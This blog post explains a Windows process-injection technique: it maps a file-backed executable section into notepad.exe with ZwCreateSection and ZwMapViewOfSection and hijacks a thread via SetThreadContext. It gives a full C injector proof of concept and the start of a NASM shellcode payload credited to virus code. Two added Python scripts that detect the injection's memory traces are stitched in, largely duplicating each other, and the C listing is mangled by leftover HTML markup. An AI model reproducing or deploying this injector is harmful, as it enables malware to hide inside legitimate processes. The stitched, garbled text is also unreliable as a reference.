Baboon's Blog - Keyword - NtCreateSection
2016-11-05T16:24:49+00:00
Baboon
ZwMapLolzSection or the return of Iinj
2009-06-27T18:09:00+01:00
Tags: Injection, NtCreateSection, NtMapViewOfSection, ZwCreateSection, ZwMapViewOfSection
<p>Hi hi hi there, you clowns</p>
<p>While trying to write a little API hooker (which I'll talk about in another post soon), I came across the ZwMapViewOfSection API exported by ntdll (the call to this API is what triggers the DLL_LOAD message sent to the debugger when a DLL is loaded).</p>
<p>After a bit of googling, MSDN tells us that:</p>
<p><q>The ZwMapViewOfSection routine maps a view of a section into the virtual address space of a subject process.</q></p>
<p>and that this function takes a process handle as a parameter.</p>
<p>So this API makes it possible to map a section into a process; the idea is then to inject code through it (and therefore without the classic VirtualAllocEx and WriteProcessMemory).</p>
<p>Looking a bit at ntdll's code, you can see that this function is almost always called with the pseudo-handle of the current process, except in the Rtl[...]Debug[...] functions (worth digging into, by the way...).</p>
<p>Oddly enough I didn't find any text or code on this subject (I didn't really look either) and I hadn't really planned to code a PoC.</p>
<p>It was while "discussing" with ivanlef0u (read: each of us yelling from our own side and insulting the other) that he convinced me to code a little PoC ("well go on, do it then and stop being a pain! I'm off to watch a movie, if it's not done in 2h I'll k-ban you from the chan for life!" [baboon's note] yeah, ivan is vulgar [/baboon's note]).</p>
<p>Anyway, so that night I coded a little PoC that works in a fairly simple way:</p>
<ol>
<li>Open a handle on the process and on one of its threads</li>
<li>Suspend the thread</li>
<li>Get its context and write its EIP into the file that is going to be injected</li>
<li>Create a section using the CreateFile and ZwCreateSection APIs</li>
<li>Map the section into the target process using the process handle and the ZwMapViewOfSection API</li>
<li>Hijack the execution flow with the SetThreadContext API and resume the thread</li>
</ol>
<p>There are nevertheless a few constraints: code injected this way ends up in a page with no write permission, so the shellcode has to use local variables and of course must not depend on where it is injected (call .delta / .delta: / pop reg / sub reg, .delta is your friend).</p>
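<p>A defender-side check for the trace this technique leaves behind, as an added example that is not part of the original post: a view of a section created over a plain file shows up in VirtualQueryEx with Type == MEM_MAPPED, whereas module code is MEM_IMAGE, so an executable MEM_MAPPED region, and a thread whose instruction pointer sits inside one, are the things to flag. The constants are the documented Win32 values; SAMPLE_REGIONS is a constructed snapshot, and scan_process() assumes Windows and a process the caller is allowed to open.</p>

```python
"""Spot executable memory that is not module code: the residue of mapping a
file-backed section executable into another process (added example)."""
import sys
from dataclasses import dataclass
from typing import List, Optional

# MEMORY_BASIC_INFORMATION values (documented Win32 constants)
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
MEM_PRIVATE = 0x20000
MEM_MAPPED = 0x40000
MEM_IMAGE = 0x1000000
PAGE_READONLY = 0x02
PAGE_READWRITE = 0x04
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
EXEC_MASK = (PAGE_EXECUTE | PAGE_EXECUTE_READ
             | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY)


@dataclass
class Region:
    base: int
    size: int
    state: int
    protect: int
    type: int

    def contains(self, addr: int) -> bool:
        return self.base <= addr < self.base + self.size


def classify(r: Region) -> Optional[str]:
    """Verdict for a committed executable region that is not module code,
    None for anything that looks normal."""
    if r.state != MEM_COMMIT or not (r.protect & EXEC_MASK):
        return None
    if r.type == MEM_MAPPED:
        # file/pagefile-backed section mapped executable: the signature of
        # the ZwCreateSection + ZwMapViewOfSection trick described above
        return "exec-mapped-section"
    if r.type == MEM_PRIVATE:
        # VirtualAllocEx-style injection, but also JIT engines: needs review
        return "exec-private"
    return None  # MEM_IMAGE: code of a properly loaded module


def suspicious_regions(regions: List[Region]) -> List[Region]:
    return [r for r in regions if classify(r) is not None]


def thread_ip_verdict(ip: int, regions: List[Region]) -> Optional[str]:
    """Verdict for a thread instruction pointer (as read by GetThreadContext):
    a hijacked thread resumes inside a flagged region."""
    for r in regions:
        if r.contains(ip):
            return classify(r)
    return None


def scan_process(pid: int) -> List[Region]:
    """Enumerate a live process with VirtualQueryEx (Windows only)."""
    import ctypes
    import ctypes.wintypes as wt

    class MBI(ctypes.Structure):  # MEMORY_BASIC_INFORMATION
        _fields_ = [("BaseAddress", ctypes.c_void_p),
                    ("AllocationBase", ctypes.c_void_p),
                    ("AllocationProtect", wt.DWORD),
                    ("RegionSize", ctypes.c_size_t),
                    ("State", wt.DWORD), ("Protect", wt.DWORD),
                    ("Type", wt.DWORD)]

    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.OpenProcess.restype = wt.HANDLE
    k32.OpenProcess.argtypes = [wt.DWORD, wt.BOOL, wt.DWORD]
    k32.VirtualQueryEx.restype = ctypes.c_size_t
    k32.VirtualQueryEx.argtypes = [wt.HANDLE, ctypes.c_void_p,
                                   ctypes.POINTER(MBI), ctypes.c_size_t]
    k32.CloseHandle.argtypes = [wt.HANDLE]
    h = k32.OpenProcess(0x0400, False, pid)  # PROCESS_QUERY_INFORMATION
    if not h:
        raise ctypes.WinError(ctypes.get_last_error())
    regions, addr, mbi = [], 0, MBI()
    try:
        while k32.VirtualQueryEx(h, addr, ctypes.byref(mbi), ctypes.sizeof(mbi)):
            base = mbi.BaseAddress or 0
            regions.append(Region(base, mbi.RegionSize, mbi.State, mbi.Protect, mbi.Type))
            addr = base + mbi.RegionSize
    finally:
        k32.CloseHandle(h)
    return regions


# Constructed sample of what a 32-bit notepad.exe could report after the
# injection: one small executable MEM_MAPPED view among normal regions.
SAMPLE_REGIONS = [
    Region(0x00400000, 0x1000, MEM_COMMIT, PAGE_READONLY, MEM_IMAGE),       # PE header
    Region(0x00401000, 0x20000, MEM_COMMIT, PAGE_EXECUTE_READ, MEM_IMAGE),  # .text
    Region(0x00130000, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READ, MEM_MAPPED),  # injected view
    Region(0x00140000, 0x10000, MEM_COMMIT, PAGE_READWRITE, MEM_PRIVATE),   # heap
    Region(0x00150000, 0x10000, MEM_RESERVE, 0, MEM_PRIVATE),               # reserved
]

if __name__ == "__main__":
    regions = scan_process(int(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_REGIONS
    for r in suspicious_regions(regions):
        print(f"{r.base:#010x} size={r.size:#x} protect={r.protect:#x} -> {classify(r)}")
```

Executable MEM_MAPPED regions are rare but not unheard of in legitimate software, so treat a hit as a lead for a closer look at the backing file and the thread that runs in it.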
<p>Injector code (yeah, I know, I don't close all my handles...):</p>
<pre class="c"><ol>
<li>#include <windows.h></li>
<li>#include <Tlhelp32.h></li>
<li>#include <string.h>   // strcmp</li>
<li> </li>
<li>#define NTSTATUS long</li>
<li>#define STATUS_SUCCESS 0</li>
<li>#define ViewUnmap 2</li>
<li> </li>
<li>// Walk the process list for `name`, then its thread list, and hand back</li>
<li>// the PID plus the id of one thread of that process (-1 on failure)</li>
<li>DWORD GetProcessIdByName(char* name, PDWORD TID)</li>
<li>{</li>
<li>    HANDLE ths = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);</li>
<li>    PROCESSENTRY32 ProcessEntry;</li>
<li>    THREADENTRY32 ThreadEntry;</li>
<li> </li>
<li>    if (ths == INVALID_HANDLE_VALUE)</li>
<li>        return -1;   // no snapshot was created, so nothing to close</li>
<li> </li>
<li>    ProcessEntry.dwSize = sizeof(PROCESSENTRY32);</li>
<li>    ThreadEntry.dwSize = sizeof(THREADENTRY32);</li>
<li>    Process32First(ths, &ProcessEntry);</li>
<li>    do {</li>
<li>        if (strcmp(ProcessEntry.szExeFile, name) == 0)</li>
<li>        {</li>
<li>            CloseHandle(ths);</li>
<li>            ths = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);</li>
<li>            Thread32First(ths, &ThreadEntry);</li>
<li>            do {</li>
<li>                if (ProcessEntry.th32ProcessID == ThreadEntry.th32OwnerProcessID)</li>
<li>                {</li>
<li>                    CloseHandle(ths);</li>
<li>                    *TID = ThreadEntry.th32ThreadID;</li>
<li>                    return ProcessEntry.th32ProcessID;</li>
<li>                }</li>
<li>            } while (Thread32Next(ths, &ThreadEntry));</li>
<li>            CloseHandle(ths);</li>
<li>            return -1;</li>
<li>        }</li>
<li>    } while (Process32Next(ths, &ProcessEntry));</li>
<li> </li>
<li>    CloseHandle(ths);</li>
<li>    return -1;</li>
<li>}</li>
<li> </li>
<li> </li>
<li>int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)</li>
<li>{</li>
<li>    // ntdll exports resolved at run time (not in the import table)</li>
<li>    NTSTATUS (__stdcall *ZwMapViewOfSection) (</li>
<li>        HANDLE SectionHandle,</li>
<li>        HANDLE ProcessHandle,</li>
<li>        OUT PVOID *BaseAddress,</li>
<li>        ULONG_PTR ZeroBits,</li>
<li>        SIZE_T CommitSize,</li>
<li>        PLARGE_INTEGER SectionOffset,</li>
<li>        PSIZE_T ViewSize,</li>
<li>        DWORD InheritDisposition,</li>
<li>        ULONG AllocationType,</li>
<li>        ULONG Win32Protect</li>
<li>    );</li>
<li> </li>
<li>    NTSTATUS (__stdcall *ZwCreateSection)(</li>
<li>        PHANDLE SectionHandle,</li>
<li>        ACCESS_MASK DesiredAccess,</li>
<li>        PDWORD ObjectAttributes OPTIONAL,</li>
<li>        PLARGE_INTEGER MaximumSize OPTIONAL,</li>
<li>        ULONG SectionPageProtection,</li>
<li>        ULONG AllocationAttributes,</li>
<li>        HANDLE FileHandle OPTIONAL</li>
<li>    );</li>
<li> </li>
<li>    HANDLE hSection;</li>
<li>    HANDLE hFile;</li>
<li>    DWORD TID;</li>
<li>    DWORD PID;</li>
<li>    HANDLE hProcess;</li>
<li>    HANDLE hThread;</li>
<li>    PVOID BaseAddress = NULL;</li>
<li>    SIZE_T ViewSize = 0;</li>
<li>    CONTEXT context;</li>
<li>    DWORD nbBytesWritten;</li>
<li> </li>
<li>    ZwMapViewOfSection = (long (__stdcall *)(HANDLE,HANDLE,PVOID *,ULONG_PTR,SIZE_T,PLARGE_INTEGER,PSIZE_T,DWORD,ULONG,ULONG))GetProcAddress(GetModuleHandleA("ntdll"),"ZwMapViewOfSection");</li>
<li> </li>
<li>    ZwCreateSection = (long (__stdcall *)(PHANDLE,ACCESS_MASK,PDWORD,PLARGE_INTEGER,ULONG,ULONG,HANDLE))GetProcAddress(GetModuleHandleA("ntdll"),"ZwCreateSection");</li>
<li> </li>
<li>    if ((! ZwMapViewOfSection) || (! ZwCreateSection))</li>
<li>    {</li>
<li>        MessageBoxA(NULL,"GetProcAddress FAIL","ARZOOOOO",0);</li>
<li>        return 0;</li>
<li>    }</li>
<li> </li>
<li>    // step 1: locate the target and one of its threads</li>
<li>    if ((PID = GetProcessIdByName("notepad.exe",&TID)) == -1)</li>
<li>    {</li>
<li>        MessageBoxA(NULL,"GetProcessIdByName FAIL","ARZOOOOO",0);</li>
<li>        return 0;</li>
<li>    }</li>
<li> </li>
<li>    if ((hThread = OpenThread(THREAD_SET_CONTEXT|THREAD_GET_CONTEXT|THREAD_SUSPEND_RESUME,FALSE,TID)) == 0)</li>
<li>    {</li>
<li>        MessageBoxA(NULL,"OpenThread FAIL","ARZOOOOO",0);</li>
<li>        return 0;</li>
<li>    }</li>
<li>    // steps 2 and 3: freeze the thread and grab its context (EIP)</li>
<li>    SuspendThread(hThread);</li>
<li>    context.ContextFlags = CONTEXT_FULL;</li>
<li>    GetThreadContext(hThread,&context);</li>
<li> </li>
<li>    // step 4: the file that backs the section</li>
<li><div>    if ((hFile = CreateFileA("lolilol",(GENERIC_READ | GENERIC_WRITE),FILE_SHARE_READ | FILE_SHARE_WRITE , <span style="color: #000000; font-weight: 
bold;">NULL</span>, OPEN_ALWAYS,<span style="color: #cc66cc;">0</span>,<span style="color: #000000; font-weight: bold;">NULL</span><span style="color: #66cc66;">)</span><span style="color: #66cc66;">)</span> <span style="color: #66cc66;">==</span> INVALID_HANDLE_VALUE<span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> MessageBoxA<span style="color: #66cc66;">(</span><span style="color: #000000; font-weight: bold;">NULL</span>,<span style="color: #ff0000;">"CreateFile FAIL"</span>,<span style="color: #ff0000;">"ARZOOOOO"</span>,<span style="color: #cc66cc;">0</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">return</span> <span style="color: #cc66cc;">0</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: 
normal;"> <span style="color: #b1b100;">if</span> <span style="color: #66cc66;">(</span><span style="color: #66cc66;">(</span><span style="color: #66cc66;">!</span>WriteFile<span style="color: #66cc66;">(</span>hFile,<span style="color: #66cc66;">&</span>context.<span style="color: #202020;">Eip</span>,<span style="color: #cc66cc;">4</span>,<span style="color: #66cc66;">&</span>nbBytesWritten,<span style="color: #000000; font-weight: bold;">NULL</span><span style="color: #66cc66;">)</span><span style="color: #66cc66;">)</span> || <span style="color: #66cc66;">(</span>nbBytesWritten <span style="color: #66cc66;">!=</span> <span style="color: #cc66cc;">4</span><span style="color: #66cc66;">)</span><span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> MessageBoxA<span style="color: #66cc66;">(</span><span style="color: #000000; font-weight: bold;">NULL</span>,<span style="color: #ff0000;">"WriteFile FAIL"</span>,<span style="color: #ff0000;">"ARZOOOOO"</span>,<span style="color: #cc66cc;">0</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">return</span> <span style="color: #cc66cc;">0</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span 
style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> CloseHandle<span style="color: #66cc66;">(</span>hFile<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">if</span> <span style="color: #66cc66;">(</span><span style="color: #66cc66;">(</span>hFile <span style="color: #66cc66;">=</span> CreateFileA<span style="color: #66cc66;">(</span><span style="color: #ff0000;">"lolilol"</span>,0x100020,FILE_SHARE_READ | FILE_SHARE_WRITE , <span style="color: #000000; font-weight: bold;">NULL</span>, OPEN_ALWAYS,<span style="color: #cc66cc;">0</span>,<span style="color: #000000; font-weight: bold;">NULL</span><span style="color: #66cc66;">)</span><span style="color: #66cc66;">)</span> <span style="color: #66cc66;">==</span> INVALID_HANDLE_VALUE<span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div 
style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> MessageBoxA<span style="color: #66cc66;">(</span><span style="color: #000000; font-weight: bold;">NULL</span>,<span style="color: #ff0000;">"CreateFile FAIL"</span>,<span style="color: #ff0000;">"ARZOOOOO"</span>,<span style="color: #cc66cc;">0</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">return</span> <span style="color: #cc66cc;">0</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">if</span> <span style="color: #66cc66;">(</span>ZwCreateSection<span style="color: #66cc66;">(</span><span style="color: #66cc66;">&</span>hSection,0xE,<span style="color: #000000; font-weight: bold;">NULL</span>,<span style="color: #000000; font-weight: bold;">NULL</span>,0x10,0x8000000,hFile<span style="color: #66cc66;">)</span> <span style="color: #66cc66;">!=</span> STATUS_SUCCESS<span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span 
style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> MessageBoxA<span style="color: #66cc66;">(</span><span style="color: #000000; font-weight: bold;">NULL</span>,<span style="color: #ff0000;">"ZwCreateSection FAIL"</span>,<span style="color: #ff0000;">"ARZOOOOO"</span>,<span style="color: #cc66cc;">0</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">return</span> <span style="color: #cc66cc;">0</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">if</span> <span style="color: #66cc66;">(</span><span style="color: #66cc66;">(</span>hProcess <span style="color: #66cc66;">=</span> OpenProcess<span style="color: #66cc66;">(</span>PROCESS_VM_OPERATION,<span style="color: #000000; font-weight: bold;">FALSE</span>,PID<span style="color: #66cc66;">)</span><span style="color: #66cc66;">)</span> <span style="color: #66cc66;">==</span> <span style="color: #000000; font-weight: bold;">NULL</span><span style="color: 
#66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> MessageBoxA<span style="color: #66cc66;">(</span><span style="color: #000000; font-weight: bold;">NULL</span>,<span style="color: #ff0000;">"OpenProcess FAIL"</span>,<span style="color: #ff0000;">"ARZOOOOO"</span>,<span style="color: #cc66cc;">0</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">return</span> <span style="color: #cc66cc;">0</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">if</span> <span style="color: #66cc66;">(</span>ZwMapViewOfSection<span style="color: #66cc66;">(</span>hSection,hProcess,<span style="color: #66cc66;">&</span>BaseAddress,<span style="color: #66cc66;">(</span>ULONG_PTR<span style="color: 
#66cc66;">)</span><span style="color: #000000; font-weight: bold;">NULL</span>,<span style="color: #cc66cc;">0</span>,<span style="color: #000000; font-weight: bold;">NULL</span>,<span style="color: #66cc66;">&</span>ViewSize,ViewUnmap,<span style="color: #cc66cc;">0</span>,0x10<span style="color: #66cc66;">)</span> <span style="color: #66cc66;">!=</span> STATUS_SUCCESS<span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> MessageBoxA<span style="color: #66cc66;">(</span><span style="color: #000000; font-weight: bold;">NULL</span>,<span style="color: #ff0000;">"ZwMapViewOfSection FAIL"</span>,<span style="color: #ff0000;">"ARZOOOOO"</span>,<span style="color: #cc66cc;">0</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">return</span> <span style="color: #cc66cc;">0</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; 
font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> context.<span style="color: #202020;">Eip</span> <span style="color: #66cc66;">=</span> <span style="color: #66cc66;">(</span><span style="color: #66cc66;">(</span>DWORD<span style="color: #66cc66;">)</span>BaseAddress<span style="color: #66cc66;">)</span> <span style="color: #66cc66;">+</span> <span style="color: #cc66cc;">4</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> SetThreadContext<span style="color: #66cc66;">(</span>hThread,<span style="color: #66cc66;">&</span>context<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> ResumeThread<span style="color: #66cc66;">(</span>hThread<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">return</span> <span style="color: #cc66cc;">0</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #66cc66;">}</span></div></li></ol></pre>
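<p>From the defender's side, an editorial addition that is not part of Baboon's post: the PoC above leaves two artifacts in the target that ordinary process memory never shows. The section is created with page protection 0x10 (PAGE_EXECUTE) and allocation attribute 0x8000000 (SEC_COMMIT) over a plain data file, so the target ends up with a committed, executable view of type MEM_MAPPED that is not a loaded image; and the hijacked thread's instruction pointer sits at BaseAddress + 4, inside that view. The Python below runs the two checks over region records of the kind VirtualQueryEx / NtQueryVirtualMemory return plus a thread id to instruction pointer table. It does not call the Windows API; the snapshot, addresses, file names and thread ids are constructed for the example.</p>

```python
from dataclasses import dataclass
from typing import Dict, List, Optional

# Memory constants from winnt.h (real Win32 values).
MEM_COMMIT = 0x1000
MEM_PRIVATE = 0x20000
MEM_MAPPED = 0x40000
MEM_IMAGE = 0x1000000
PAGE_READWRITE = 0x04
PAGE_EXECUTE = 0x10        # the 0x10 the PoC passes to ZwCreateSection and ZwMapViewOfSection
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
PAGE_GUARD = 0x100
PAGE_NOCACHE = 0x200
PAGE_WRITECOMBINE = 0x400
EXECUTABLE = {PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}
TYPE_NAME = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}


@dataclass
class Region:
    """One region as VirtualQueryEx describes it (MEMORY_BASIC_INFORMATION fields)."""
    base: int
    size: int
    state: int
    protect: int
    type: int
    mapped_file: str = ""  # backing file if known (GetMappedFileName), "" otherwise


def is_executable(protect: int) -> bool:
    """True for any PAGE_EXECUTE* protection; guard/cache modifier bits are ignored."""
    return (protect & ~(PAGE_GUARD | PAGE_NOCACHE | PAGE_WRITECOMBINE)) in EXECUTABLE


def region_containing(regions: List[Region], addr: int) -> Optional[Region]:
    """The region that covers addr, or None if nothing is mapped there."""
    for r in regions:
        if r.base <= addr < r.base + r.size:
            return r
    return None


def triage(regions: List[Region], thread_ips: Dict[int, int]) -> List[str]:
    """One finding per suspicious region or thread; an empty list means nothing odd."""
    findings: List[str] = []
    for r in regions:
        if r.state != MEM_COMMIT or not is_executable(r.protect):
            continue
        if r.type == MEM_MAPPED:
            # The loader maps PE files as MEM_IMAGE, so an executable view of a plain
            # (data-file or pagefile backed) section is rare in a clean process; it is
            # exactly what the ZwCreateSection + ZwMapViewOfSection PoC leaves behind.
            findings.append(
                f"executable MEM_MAPPED view at {r.base:#010x} size {r.size:#x}, "
                f"backing file {r.mapped_file or 'unknown'}"
            )
        elif r.type == MEM_PRIVATE:
            # Executable private memory: VirtualAllocEx-style injection, or a JIT runtime.
            findings.append(f"executable MEM_PRIVATE region at {r.base:#010x} size {r.size:#x}")
    for tid, ip in thread_ips.items():
        r = region_containing(regions, ip)
        if r is None or r.type != MEM_IMAGE:
            # A SetThreadContext hijack shows up as a thread executing outside every module.
            where = TYPE_NAME.get(r.type, "unknown") if r else "unmapped"
            findings.append(f"thread {tid} executing at {ip:#010x} in {where} memory, not in a loaded image")
    return findings


# Constructed sample (addresses, names and thread ids are made up): a 32-bit process
# snapshot taken after the PoC ran against it.
SAMPLE_REGIONS = [
    Region(0x0012E000, 0x2000, MEM_COMMIT, PAGE_READWRITE, MEM_PRIVATE),                  # stack
    Region(0x00140000, 0x10000, MEM_COMMIT, PAGE_READWRITE, MEM_PRIVATE),                 # heap
    Region(0x00370000, 0x1000, MEM_COMMIT, PAGE_EXECUTE, MEM_MAPPED, "lolilol"),          # injected view
    Region(0x01001000, 0x7000, MEM_COMMIT, PAGE_EXECUTE_READ, MEM_IMAGE, "notepad.exe"),  # .text
    Region(0x7C901000, 0x80000, MEM_COMMIT, PAGE_EXECUTE_READ, MEM_IMAGE, "ntdll.dll"),
]
# Thread 1 had its Eip set to BaseAddress + 4, as the PoC does; thread 2 is parked in ntdll.
SAMPLE_THREAD_IPS = {1: 0x00370004, 2: 0x7C90EB94}

if __name__ == "__main__":
    for line in triage(SAMPLE_REGIONS, SAMPLE_THREAD_IPS):
        print(line)
```

<p>On the constructed snapshot the scan reports the executable MEM_MAPPED view backed by "lolilol" and thread 1 executing inside it, and nothing for the image-backed regions or the thread sitting in ntdll. JIT runtimes are the usual benign source of the MEM_PRIVATE and out-of-image findings, so those two are worth correlating with the process's loaded modules before acting on them; the executable non-image section view has far fewer legitimate explanations.</p>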
<p>The payload, in NASM, assembled to a raw .bin (VERY largely lifted from Silma's code for his <a href="http://fat.next-touch.com/code/win32.larva.asm" hreflang="fr">win32.larva</a>):</p>
<pre class="asm"><ol><li><div>BITS 32</div></li>
<li><div>OriginalEip dd 0</div></li>
<li><div>    push edi</div></li>
<li><div>    call delta</div></li>
<li><div>delta:</div></li>
<li><div>    pop edi</div></li>
<li><div>    sub edi, delta</div></li>
<li><div>    push DWORD [OriginalEip+edi]</div></li>
<li><div>    xchg edi, [esp]</div></li>
<li><div>    xchg edi, [esp+4]</div></li>
<li><div>    xchg edi, [esp]</div></li>
